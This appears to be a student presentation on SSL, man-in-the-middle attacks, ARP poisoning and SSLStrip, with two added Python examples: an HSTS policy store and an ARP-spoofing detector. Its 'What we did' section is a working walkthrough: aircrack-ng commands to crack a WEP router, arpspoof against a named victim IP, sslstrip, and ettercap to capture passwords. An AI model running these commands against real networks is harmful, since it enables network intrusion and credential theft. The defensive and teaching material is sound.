Trevor Kiernan, Glen Saunders
Bruce Schneier's earliest childhood memory is encrypted.
Attack
What is SSL?
Secure Socket Layer
Predecessor to Transport Layer Security (TLS)
Establishes a secure connection between two computers
Important for banking sites and others
Authenticates: the server is actually who it says it is
Runs on port 443 (not HTTP's port 80)
Client sends a client hello
Server sends a signed certificate
Verified by a Certificate Authority such as Verisign
Certificate used to encrypt data
What is MITM?
Eve tells Bob she is Alice and Alice that she is Bob
Bruce Schneier killed Eve and Mallory with a birthday attack!
What is MITM?
When Alice sends something to Eve (thinking she's Bob), Eve can read it
Eve forwards this information to Bob
Bob replies to Eve (thinking she's Alice)
Eve can read e-mail and intercept supposedly secure data (user names and passwords!)
ARP = Address Resolution Protocol
Alice sends an ARP request (who is 192.168.1.1?)
Eve replies before the router can, so that Alice thinks she is the router
Now Alice's ARP cache is poisoned; she thinks Eve is the router
Eve forwards the packets on to the real router
What is SSLStrip?
Performs the aforementioned MITM attack
Forwards all regular HTTP traffic
Changes Alice's HTTP request to HTTPS
Forwards this request via HTTPS to Bob
An explicit HTTPS request is answered with a fake certificate signed by Eve
Replaces images with a secure lock
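What defeats this downgrade on the client side is HTTP Strict Transport Security (HSTS, RFC 6797): once a site has told the browser, over a good TLS connection, that it must only be reached over HTTPS, the browser rewrites http:// links to https:// itself before sending anything, so there is no plain HTTP request left for Eve to take over. The following is an added example, not part of the presentation, of that client-side policy store: header parsing, expiry, port handling and subdomain matching follow the RFC; the host names, header values and timestamps in the usage are constructed for the example.

```python
import time
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit, urlunsplit


def parse_hsts_header(value: str) -> Optional[Tuple[int, bool]]:
    """Parse a Strict-Transport-Security header value (RFC 6797 section 6.1).

    Returns (max_age_seconds, include_subdomains), or None when the header is
    malformed (no max-age, a non-numeric max-age, or a repeated directive),
    in which case a conforming client ignores it.
    """
    max_age: Optional[int] = None
    include_subdomains = False
    seen = set()
    for raw in value.split(";"):
        directive = raw.strip()
        if not directive:
            continue
        name, _, param = directive.partition("=")
        name = name.strip().lower()
        if name in seen:  # a directive may appear only once
            return None
        seen.add(name)
        if name == "max-age":
            param = param.strip().strip('"')  # the quoted-string form is allowed
            if not param.isdigit():
                return None
            max_age = int(param)
        elif name == "includesubdomains":
            include_subdomains = True
        # unknown directives are ignored, as the RFC requires
    if max_age is None:
        return None
    return max_age, include_subdomains


class HstsStore:
    """A minimal client-side HSTS policy store (the 'Known HSTS Host' list)."""

    def __init__(self) -> None:
        # host -> (expiry time, include_subdomains)
        self._known: Dict[str, Tuple[float, bool]] = {}

    def observe_response(self, host: str, headers: Dict[str, str],
                         over_tls: bool, now: float) -> None:
        """Record policy from a response. Only a response received over TLS
        with a valid certificate may set policy; on plain HTTP the header is
        ignored, which is why a stripped connection cannot plant one."""
        if not over_tls:
            return
        value = next((v for k, v in headers.items()
                      if k.lower() == "strict-transport-security"), None)
        if value is None:
            return
        parsed = parse_hsts_header(value)
        if parsed is None:
            return
        max_age, include_subdomains = parsed
        host = host.lower()
        if max_age == 0:  # max-age=0 tells the client to forget the host
            self._known.pop(host, None)
            return
        self._known[host] = (now + max_age, include_subdomains)

    def is_known(self, host: str, now: float) -> bool:
        """Exact-host match, or a superdomain whose policy has includeSubDomains."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            entry = self._known.get(candidate)
            if entry is None:
                continue
            expires_at, include_subdomains = entry
            if expires_at <= now:
                del self._known[candidate]  # expired policy is dropped
                continue
            if i == 0 or include_subdomains:
                return True
        return False

    def rewrite(self, url: str, now: float) -> str:
        """Upgrade an http:// URL to https:// for a known host before any request
        is sent; port 80 becomes 443, other explicit ports are kept (RFC 6797 8.3).
        Assumes DNS host names rather than bracketed IPv6 literals."""
        parts = urlsplit(url)
        host = parts.hostname or ""
        if parts.scheme != "http" or not self.is_known(host, now):
            return url
        netloc = host if parts.port in (None, 80) else f"{host}:{parts.port}"
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    store = HstsStore()
    # Constructed usage: a bank answered over TLS with a one-year policy.
    store.observe_response("bank.example",
                           {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"},
                           over_tls=True, now=time.time())
    print(store.rewrite("http://www.bank.example/login", time.time()))
```

The important line is the `over_tls` check in `observe_response`: the policy is learned only from a genuine HTTPS response, and from then on the client never emits the http:// request that SSLStrip relies on. The first visit to a site the browser has never seen remains exposed, which is why browsers also ship a preloaded list of HSTS hosts.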
Capturing Information
Ettercap pulls passwords and user names for many different programs and protocols
Displays Bob's IP and URL
SSLStrip creates a log file
What we did
1. Scan for networks
2. Crack a network
3. Connect to the cracked network
4. Learn about a host on the network
5. MITM on that host
6. Strip his/her SSL
7. Scan for usernames and passwords
8. Exit gracefully
airodump-ng wlan1
Crack it
airodump-ng -c 11 -w target_router wlan1 &
aireplay-ng -1 0 -e target_router -h [faked mac address] wlan1
After a successful connection:
aireplay-ng -3 -e target_router -h [faked mac] wlan1
Let the data rate climb, then:
aircrack-ng target_router-01.cap
Within 5 minutes you should have the WEP key. :-D
Connect
Connect to the router with the card you just attacked with. It should still have the same faked MAC address it was set to in the previous ARP replay attack. So now it's time for some recon.
The tattoos on Bruce Schneier's fists say "Alice" and "Bob". You don't want to make him exchange keys over your face.
RECON
This keeps the packet count lower and limits it to pinging
We liked 192.168.1.2
Ran an OS fingerprint on it and checked which versions the open ports were using
This generates a lot of traffic
This host looked good and responded to our probes, so let's MITM.
Find a host
RECON homing in
MITM
arpspoof -i wlan0 -t [their ip] [router ip]
arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1
SSL strip
sslstrip -a -k -f
-a : log all SSL traffic
-k : kill current sessions
-f : insert a lock icon in their connections
ettercap -T -q -i wlan0
This will log traffic over our connection and filter out the target's passwords, which then show up in our window. We can pipe this to a file as well.
The set of Bruce Schneier's weaknesses is a mathematical constant. It is represented by the symbol .
If Bruce Schneier wants your plaintext, he'll just squeeze it out of the ciphertext using his bare hands.
How to Prevent?
ARP replies appearing very frequently
Invalid certificate error
Nmap scans
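The first warning sign above, and the ARP cache poisoning described under "What is MITM?", can be caught from a packet capture on the victim's segment. The following is an added example, not part of the presentation, of a small monitor that flags the three classic symptoms: a reply that no one requested, an IP address whose MAC binding changes, and too many replies from one MAC in a short window. The input lines are constructed for the example in the format tcpdump prints for ARP traffic, the trusted router binding is an assumed value, and the thresholds (2-second request window, more than 5 replies in 10 seconds) are assumptions to tune for a real network.

```python
import re
from collections import defaultdict, deque
from typing import Deque, Dict, List, Optional

# Constructed capture: a legitimate request/reply for the router, then a second
# MAC claiming the router's address every two seconds without being asked.
SAMPLE_LINES = [
    "12:00:00.100000 ARP, Request who-has 192.168.1.1 tell 192.168.1.2, length 28",
    "12:00:00.100500 ARP, Reply 192.168.1.1 is-at aa:bb:cc:00:00:01, length 28",
    "12:00:02.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:04.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:06.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:08.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:10.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
    "12:00:12.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
]

# One ARP packet per line, as tcpdump prints it (timestamp, "ARP,", then either
# "Request who-has X tell Y" or "Reply X is-at MAC").
ARP_LINE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) ARP, "
    r"(?:Request who-has (?P<req_target>[^\s,]+) tell (?P<req_sender>[^\s,]+)"
    r"|Reply (?P<rep_ip>[^\s,]+) is-at (?P<rep_mac>[0-9A-Fa-f:]{17}))"
)


def _seconds(ts: str) -> float:
    """Convert HH:MM:SS.ffffff to seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


class ArpMonitor:
    """Flags the classic signs of ARP cache poisoning on one segment."""

    def __init__(self, trusted: Optional[Dict[str, str]] = None,
                 request_window: float = 2.0, rate_window: float = 10.0,
                 max_replies: int = 5) -> None:
        # ip -> mac, seeded from a trusted table (e.g. the router's real MAC);
        # otherwise the first binding seen is trusted. Thresholds are assumptions.
        self.bindings = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        self.pending: Dict[str, float] = {}  # ip -> time of the last request for it
        self.reply_times: Dict[str, Deque[float]] = defaultdict(deque)  # mac -> reply times
        self.request_window = request_window
        self.rate_window = rate_window
        self.max_replies = max_replies

    def feed(self, line: str) -> List[str]:
        """Consume one capture line and return the alerts it raises (possibly none)."""
        m = ARP_LINE.match(line)
        if not m:
            return []
        t = _seconds(m.group("ts"))
        if m.group("req_target"):
            self.pending[m.group("req_target")] = t
            return []
        ip, mac = m.group("rep_ip"), m.group("rep_mac").lower()
        alerts: List[str] = []
        # 1. A reply nobody asked for (poisoning tools send these continuously).
        asked = self.pending.pop(ip, None)
        if asked is None or t - asked > self.request_window:
            alerts.append(f"unsolicited reply: {ip} is-at {mac}")
        # 2. An IP we already know is now claimed by a different MAC.
        known = self.bindings.get(ip)
        if known is None:
            self.bindings[ip] = mac
        elif known != mac:
            alerts.append(f"binding change: {ip} was {known}, now claimed by {mac}")
        # 3. Too many replies from one MAC inside the rate window.
        times = self.reply_times[mac]
        times.append(t)
        while times and t - times[0] > self.rate_window:
            times.popleft()
        if len(times) > self.max_replies:
            alerts.append(f"reply flood: {mac} sent {len(times)} replies in {self.rate_window:g}s")
        return alerts


def scan(lines: List[str], trusted: Optional[Dict[str, str]] = None, **thresholds) -> List[str]:
    """Run the monitor over captured lines; each alert is prefixed with its timestamp."""
    monitor = ArpMonitor(trusted, **thresholds)
    alerts: List[str] = []
    for line in lines:
        for alert in monitor.feed(line):
            alerts.append(f"{line[:15]} {alert}")
    return alerts


if __name__ == "__main__":
    # Assumed trusted binding for the router; without it the first reply seen is trusted.
    for alert in scan(SAMPLE_LINES, trusted={"192.168.1.1": "aa:bb:cc:00:00:01"}):
        print(alert)
```

On the sample capture the legitimate reply at 12:00:00 raises nothing, every later reply is both unsolicited and a binding change, and the sixth one within ten seconds trips the flood threshold. The binding check is the one that matters most: seeding it with the real router MAC means the very first forged reply is caught, before the victim's cache is overwritten.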